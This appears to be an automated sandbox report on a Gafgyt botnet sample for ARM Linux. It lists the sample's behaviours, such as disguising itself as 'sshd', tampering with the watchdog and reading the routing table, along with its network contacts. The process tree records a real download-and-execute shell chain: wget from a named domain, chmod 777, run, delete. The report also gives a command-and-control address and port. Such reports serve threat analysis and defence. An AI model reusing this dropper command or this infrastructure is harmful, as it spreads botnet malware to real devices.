Analysis Overview
SHA256
a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a
Threat Level: Known bad
The file a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf was found to be: Known bad.
Malicious Activity Summary
Detected Gafgyt variant
Gafgyt family
Changes its process name
Executes dropped EXE
Modifies Watchdog functionality
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:18
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:18
Reported
2024-04-02 01:21
Platform
debian9-armhf-20240226-en
Max time kernel
147s
Max time network
138s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
| File opened for modification | /dev/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf
[/tmp/a9dbdd95ebd8c9e6fb7de29c21103ddba18a62f2393bfa7ba365a491e37b342a.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
| MD | 85.239.33.129:666 | | tcp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |
| MD | 85.239.33.129:666 | | tcp |